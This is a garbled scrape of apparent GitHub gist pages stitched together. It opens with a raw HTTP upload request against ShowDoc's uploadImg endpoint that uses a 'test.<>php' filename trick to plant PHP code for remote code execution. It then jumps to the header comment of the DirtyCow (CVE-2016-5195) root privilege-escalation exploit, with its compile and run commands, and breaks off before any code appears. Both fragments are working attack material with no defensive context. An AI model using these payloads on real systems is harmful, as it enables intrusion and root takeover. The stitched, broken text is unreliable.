POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Content-Length: 239
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
Accept-Encoding: gzip
----------------------------835846770881083140190633
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
lay3rt cc06
pikpikcu
/ showdoc-rce.md
Created
April 21, 2021 07:33
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * A PTRACE_POKEDATA variant of CVE-2016-5195 | |
| * should work on RHEL 5 & 6 | |
| * | |
| * (un)comment correct payload (x86 or x64)! | |
| * $ gcc -pthread c0w.c -o c0w | |
| * $ ./c0w | |
| * DirtyCow root privilege escalation | |
| * Backing up /usr/bin/passwd.. to /tmp/bak | |
| * mmap fa65a000 |